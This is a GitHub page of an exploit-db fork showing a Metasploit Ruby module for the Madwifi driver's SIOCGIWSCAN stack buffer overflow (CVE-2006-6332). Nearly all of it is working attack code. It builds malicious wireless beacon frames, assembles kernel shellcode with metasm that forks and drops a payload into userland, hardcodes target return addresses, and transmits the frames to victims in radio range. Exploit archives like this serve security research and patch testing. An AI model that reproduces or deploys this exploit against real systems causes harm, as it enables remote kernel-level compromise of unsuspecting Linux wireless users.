forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path16835.rb
More file actions
executable file
·385 lines (308 loc) · 9.47 KB
/
Copy path16835.rb
File metadata and controls
executable file
·385 lines (308 loc) · 9.47 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
##
# $Id: madwifi_giwscan_cb.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# Madwifi remote kernel exploit
# 100% reliable, doesn't crash wifi stack, can exploit
# same target multiple times
#
# Julien TINNES <julien at cr0.org>
# Laurent BUTTI <0x9090 at gmail.com>
#
# vuln in giwscan_cb, here's the path:
#
# ieee80211_ioctl_giwscan -> ieee80211_scan_iterate -> sta_iterate -> giwscan_cb
#
require 'msf/core'
require 'metasm'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Lorcon2
def initialize(info = {})
super(update_info(info,
'Name' => 'Madwifi SIOCGIWSCAN Buffer Overflow',
'Description' => %q{
The Madwifi driver under Linux is vulnerable to a remote kernel-mode
stack-based buffer overflow.
The vulnerability is triggered by one of these properly crafted
information element: WPA, RSN, WME and Atheros OUI Current madwifi
driver (0.9.2) and and all madwifi-ng drivers since r1504 are
vulnerable
Madwifi 0.9.2.1 release corrects the issue.
This module has been tested against Ubuntu 6.10 and is 100% reliable,
doesn\'t crash the Wifi stack and can exploit the same machine multiple
time without the need to reboot it.
This module depends on the Lorcon2 library and only works on the Linux
platform with a supported wireless card. Please see the Ruby Lorcon2
documentation (external/ruby-lorcon/README) for more information.
},
'Author' =>
[
'Julien Tinnes <julien at cr0.org>',
'Laurent Butti <0x9090 at gmail.com>'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2006-6332'],
['OSVDB', '31267'],
['URL', 'http://www.madwifi.org']
],
#'Stance' => Msf::Exploit::Stance::Passive,
'Platform' => 'linux',
'Arch' => [ ARCH_X86 ],
'Payload' =>
{
#'Space' => 65,
# Metasploit doesn't support dynamic size payloads
# so we will handle this in metasm instead and ask for
# the smaller payload possible
#'Encoder' => Msf::Encoder::Type::Raw,
'DisableNops' => true
},
'Targets' =>
[
[ 'Ubuntu 6.10',
{
'JMPESP' => 0xffffe777,
'scan_iterate_ra' => "0x8014401"
}
],
[ 'Generic (you need non randomized vdso)',
{
'JMPESP' => 0xffffe777,
'scan_iterate_ra' => nil
}
]
],
'DisclosureDate' => 'Dec 08 2006'
))
register_options(
[
OptBool.new('SINGLESHOT', [ true, "Break after first victim (for msfcli)", 'false']),
OptString.new('SSID', [ true, "The SSID of the emulated access point", 'test']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 600]),
OptInt.new('LENGTH', [ true, "Length after local variables in giwscan_cb() to overwrite", 24]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']),
], self.class)
end
def exploit
open_wifi
#puts "kikoo " + payload.encoded.inspect
#puts payload.encoded.to_s.unpack('C*').map { |i| i.to_s 16 }.join(',')
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Shellcode size is: #{payload.encoded.length} bytes")
print_status("Creating malicious beacon frame...")
frame = create_beacon()
print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(frame)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
break if session_created? and datastore['SINGLESHOT']
end
print_status("Completed sending #{count} beacons.")
end
def create_beacon
ssid = datastore['SSID'].to_s
bssid = Rex::Text.rand_text(6)
channel = datastore['CHANNEL'].to_i
len = datastore['LENGTH'].to_i
seq = [rand(255)].pack('n')
jmpesp = target['JMPESP'] # jmp esp in vdso
# address just after the call (in ieee80211_scan_iterate in wlan.ko)
scan_iterate_ra=target['scan_iterate_ra']
if scan_iterate_ra
howtoreturn = "RETURN_PROPERLY" # Return to the parent of giwscan_cb parent
else
howtoreturn = "RETURN_BADLY" # Return to userland with IRET
end
bssiwlist = 0x0804ddd0
stacksize = "STACK_8K"
getregs = "CALCULATE"
#getregs = "IWANTTOSCANMANUALLY"
reg_cs = "0x73"
reg_ss = "0x7b"
wiframe = Metasm::Shellcode.assemble Metasm::Ia32.new, <<EOS
#define #{stacksize} 1
#define #{getregs} 1
#define CS #{reg_cs}
#define SS #{reg_ss}
#define #{howtoreturn} 1
; chunk1
db 0, 0x50, 0xf2 ; wpa_oui
db 1 ; wpa_typ
db 1, 0 ; wpa_ver
back2:
;push 0x1C
;ret
;cld
#ifdef RETURN_PROPERLY
mov ebx, esp ; save esp
#endif
#ifdef IWANTTOSCANMANUALLY
mov eax, 4
checkforcs:
add esp, eax
cmp dword ptr [esp], 0x73 ; scan for cs
jnz checkforcs
cmp dword ptr [esp+12], 0x7b ; scan for ss
jnz checkforcs
mov edi, dword ptr [esp+8] ; put user stack address in edi
push edi
; NO SCAN, calculate the good value
#else
#ifdef STACK_8K
or esp, (0x2000-1) ; assume 8K stack
#else
or esp, (0x1000-1) ; assume 4K stack
#endif
sub esp, 0x17 ; cf return_from_syscall
mov edi, dword ptr [esp+8]
push edi
; IWANTTOSCANMANUALLY
#endif
; We can also go to BSS instead of stack
;mov edi, #{bssiwlist}
;push edi
call endsc
beginsc:
#if 0
call greetings
toto db "You're pwn3d :(\\n"
greetings:
mov eax, 4
mov ebx, 1
pop ecx
mov edx, (greetings - toto)
int 0x80
#endif
xor eax, eax
inc eax
inc eax
int 0x80 ; fork
cmp eax, 0
jnz doexit
;#include "/home/julien/Audit/metasploit3/modules/exploits/linux/madwifi/connectback.asm"
;; Metasploit's shellcode integration
; Old, bad method
;metasc db "#{payload.encoded.unpack('C*').map { |i| '\\x%02x' % i }.join}"
; this will be replaced by metasploit's payload
metasc:
; metasm will add padding here so that the next .offset is honored
.pad db 0x33
metascend:
doexit:
#if 1
; exit
xor eax, eax
inc eax
;mov ebx, 42
int 0x80
#endif
endsc:
pop esi
; let's copy the shellcode to userland
mov ecx, endsc - beginsc
rep movsb
#ifdef RETURN_PROPERLY
mov esp, ebx ; restore stack pointer
; If SCANFOR_SCAN_ITERATE defined
; scan for ieee80211_scan_iterate
; example address: e0b46401 (scan_iterate+0x11)
; It should be easier to use this if porting the exploit in a hurry
;#define SCANFOR_SCAN_ITERATE
#ifdef SCANFOR_SCAN_ITERATE
sub esp, 4 ; you can remove this in most cases
checkforretadd:
add esp, 4
mov ebx, dword ptr [esp+16] ; scan for return address, we know that we have
; four saved register before the return address
; (+16)
and ebx, 0x07FF
cmp ebx, #{scan_iterate_ra} & 0x07FF
jnz checkforretadd
;mov ebp, edi ; fixup EBP (cf end of ieee80211_ioctl_giwscan which will use it)
; we need a writeable address
#endif
; Here we know the stack layout and esp already has the correct value
pop ebx ; Well, no need to fixup EBP, just run
; sta_iterate epilogue, thanks Staphane Duverger,
; how could I miss that!
pop esi
pop edi
pop ebp
; release the locks
push esi ; save esi
mov eax, edi ; we use the fact that edi has the same value in ieee80211_ioctl_giwscan
; just before the call to i*_scan_iterate and in sta_iterate just before
; the ret
mov eax, [eax+0x978] ; cf. i*_scan_iterate
mov esi, [eax+8] ; cf. sta_iterate
xor eax, eax
inc eax
mov edx, eax
;xchg dl, [esi] ; already unlocked
xchg al, [esi+0x8C] ; release the lock!
pop esi
ret ; end of sta_iterate epilogue
; Else we don't return properly
#else
; we directly return from the syscall
iret
#endif
.offset 64*2+21
; chunk2
back1:
jmp.i back2
dd 0 ; this MUST be zero
; chunk3
dd 0, 0, 0, 0 ; end_buf, current_ev, ieee, iwscanreq
; chunk4
db #{len-6} dup(0x33)
;dd 0xffffe777 ; addr of 'jmp esp' in vdso page
dd #{jmpesp}
jmp.i8 back1
; assert
.offset 198
;.padto 198 ; assert
EOS
wiframe.encoded.patch("metasc", "metascend", payload.encoded)
value = wiframe.encode_string
#, 'monadresseip'=>(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff)
#puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',')
if (len == 24 and value.length != 198)
raise "Value is too big! #{value.length}"
end
buf = "\xdd" + value.length.chr + value
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
# ssid IE
"\x00" + ssid.length.chr + ssid +
# supported rates IE
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# channel IE
"\x03" + "\x01" + channel.chr +
# invalid wpa IE buffer overflow
# wpa ie is an example, still valid for other IEs
buf
return frame
end
end